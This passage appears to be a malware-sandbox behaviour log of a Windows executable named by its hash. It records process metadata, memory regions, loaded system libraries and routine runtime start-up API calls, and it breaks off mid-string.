# Flog Txt Version 1 # Analyzer Version: 4.3.1 # Analyzer Build Date: Oct 25 2021 05:57:50 # Log Creation Date: 27.10.2021 11:59:00.472 Process: id = "1" image_name = "d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe" page_root = "0x496e6000" os_pid = "0xd3c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x640" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 118 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 119 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 120 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 121 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 122 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 123 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 124 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 125 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 126 start_va = 0x400000 end_va = 0x2ef3fff monitored = 1 entry_point = 0x402738 region_type = mapped_file name = "d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe") Region: id = 127 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 128 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 129 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 130 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 131 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 132 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 270 start_va = 0x2fd0000 end_va = 0x2fdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fd0000" filename = "" Region: id = 271 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 272 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 273 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 274 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 275 start_va = 0x2fe0000 end_va = 0x32cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fe0000" filename = "" Region: id = 276 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 277 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 278 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 279 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 280 start_va = 0x2f00000 end_va = 0x2fbdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 281 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 282 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 283 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 284 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 285 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 286 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 287 start_va = 0x2fe0000 end_va = 0x30dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fe0000" filename = "" Region: id = 288 start_va = 0x31d0000 end_va = 0x32cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000031d0000" filename = "" Region: id = 289 start_va = 0x30e0000 end_va = 0x3109fff monitored = 0 entry_point = 0x30e5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 290 start_va = 0x32d0000 end_va = 0x3457fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000032d0000" filename = "" Region: id = 291 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 292 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 293 start_va = 0x2fc0000 end_va = 0x2fc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002fc0000" filename = "" Region: id = 294 start_va = 0x3460000 end_va = 0x35e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003460000" filename = "" Region: id = 295 start_va = 0x35f0000 end_va = 0x49effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000035f0000" filename = "" Region: id = 296 start_va = 0x49f0000 end_va = 0x4afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049f0000" filename = "" Region: id = 297 start_va = 0x30e0000 end_va = 0x30e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030e0000" filename = "" Region: id = 298 start_va = 0x4b00000 end_va = 0x52fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b00000" filename = "" Region: id = 299 start_va = 0x30f0000 end_va = 0x30f2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030f0000" filename = "" Region: id = 300 start_va = 0x30f0000 end_va = 0x30f2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000030f0000" filename = "" Region: id = 301 start_va = 0x30f0000 end_va = 0x30f8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000030f0000" filename = "" Region: id = 302 start_va = 0x706d0000 end_va = 0x70744fff monitored = 0 entry_point = 0x70709a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 303 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 304 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 305 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 306 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 307 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 308 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 309 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 310 start_va = 0x3100000 end_va = 0x314ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 311 start_va = 0x4b00000 end_va = 0x4c5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b00000" filename = "" Region: id = 312 start_va = 0x76030000 end_va = 0x7614efff monitored = 0 entry_point = 0x76075980 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 313 start_va = 0x3100000 end_va = 0x3100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003100000" filename = "" Region: id = 314 start_va = 0x3140000 end_va = 0x314ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003140000" filename = "" Region: id = 315 start_va = 0x49f0000 end_va = 0x4aabfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049f0000" filename = "" Region: id = 316 start_va = 0x4af0000 end_va = 0x4afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004af0000" filename = "" Region: id = 317 start_va = 0x3100000 end_va = 0x3103fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003100000" filename = "" Region: id = 318 start_va = 0x70180000 end_va = 0x7019cfff monitored = 0 entry_point = 0x70183b10 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 319 start_va = 0x3110000 end_va = 0x3112fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 335 start_va = 0x3110000 end_va = 0x3110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Thread: id = 1 os_tid = 0x714 [0099.393] GetStartupInfoW (in: lpStartupInfo=0x19ff18 | out: lpStartupInfo=0x19ff18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0099.393] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0099.393] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x4af0000 [0099.395] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0099.395] GetProcAddress (hModule=0x74650000, lpProcName="FlsAlloc") returned 0x7466a980 [0099.395] GetProcAddress (hModule=0x74650000, lpProcName="FlsGetValue") returned 0x74667570 [0099.396] GetProcAddress (hModule=0x74650000, lpProcName="FlsSetValue") returned 0x74669e30 [0099.396] GetProcAddress (hModule=0x74650000, lpProcName="FlsFree") returned 0x74674ff0 [0099.398] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x214) returned 0x4af05a8 [0099.398] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0099.399] GetCurrentThreadId () returned 0x714 [0099.399] GetStartupInfoW (in: lpStartupInfo=0x19feb4 | out: lpStartupInfo=0x19feb4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0099.399] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x8, Size=0x800) returned 0x4af07c8 [0099.399] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0099.399] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0099.399] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0099.399] SetHandleCount (uNumber=0x20) returned 0x20 [0099.399] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\d836a03e0b7eeabbc971de7d3e6fcc11bf06e13e633d11118c7429b3abb3c4ed.exe\" " [0099.399] GetEnvironmentStringsW () returned 0x31dfd20* [0099.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1293, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1293 [0099.400] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x0, Size=0x50d) returned 0x4af0fd0 [0099.400] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1293, lpMultiByteStr=0x4af0fd0, cbMultiByte=1293, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1293 [0099.400] FreeEnvironmentStringsW (penv=0x31dfd20) returned 1 [0099.400] GetLastError () returned 0xcb [0099.400] SetLastError (dwErrCode=0xcb) [0099.400] GetLastError () returned 0xcb [0099.400] SetLastError (dwErrCode=0xcb) [0099.400] GetLastError () returned 0xcb [0099.400] SetLastError (dwErrCode=0xcb) [0099.400] GetACP () returned 0x4e4 [0099.401] RtlAllocateHeap (HeapHandle=0x4af0000, Flags=0x0, Size=0x220) returned 0x4af14e8 [0099.401] GetLastError () returned 0xcb [0099.401] SetLastError (dwErrCode=0xcb) [0099.401] IsValidCodePage (CodePage=0x4e4) returned 1 [0099.401] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fe7c | out: lpCPInfo=0x19fe7c) returned 1 [0099.401] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f948 | out: lpCPInfo=0x19f948) returned 1 [0099.401] GetLastError () returned 0xcb [0099.401] SetLastError (dwErrCode=0xcb) [0099.401] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0099.401] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ覥@Ā") returned 256 [0099.401] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ覥@Ā", cchSrc=256, lpCharType=0x19f95c | out: lpCharType=0x19f95c) returned 1 [0099.401] GetLastError () returned 0xcb [0099.401] SetLastError (dwErrCode=0xcb) [0099.402] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0099.402] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0099.402] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0099.402] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0099.402] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x19fc5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x17-9±\x94þ\x19", lpUsedDefaultChar=0x0) returned 256 [0099.402] GetLastError () returned 0xcb [0099.402] SetLastError (dwErrCode=0xcb) [0099.402] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0099.402] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0099.402] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 